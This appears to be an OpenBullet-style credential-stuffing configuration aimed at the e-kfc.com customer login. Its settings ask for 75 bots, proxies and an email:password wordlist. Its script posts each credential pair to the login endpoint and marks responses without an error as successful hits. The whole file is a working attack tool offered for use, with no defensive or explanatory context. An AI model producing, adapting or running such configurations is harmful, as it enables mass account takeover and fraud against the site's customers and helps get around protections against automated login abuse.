[SETTINGS]
{
  "Name": "KFC",
  "SuggestedBots": 75,
  "LastModified": "2018-07-10T15:59:47.1463423+00:00",
  "AdditionalInfo": "NO SURE WORK",
  "Author": "Meyer",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#GET_LOGIN_PAGE REQUEST GET "https://www.e-kfc.com/secured/login" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Authorization: rRPlJMoZH27ETD0YqwCaalWCQmbc1wjT" 
PARSE "<SOURCE>" JSON "Authorization" Recursive=FALSE -> VAR "TOKEN" "" "" 
#POST_LOGIN REQUEST POST "https://www.e-kfc.com/secured/login" AutoRedirect=TRUE 
  CONTENT "email=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Authorization: rRPlJMoZH27ETD0YqwCaalWCQmbc1wjT" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "{\"error\"" 
  KEYCHAIN Success OR 
    KEY "<SOURCE>" DoesNotContain "{\"error\"" 
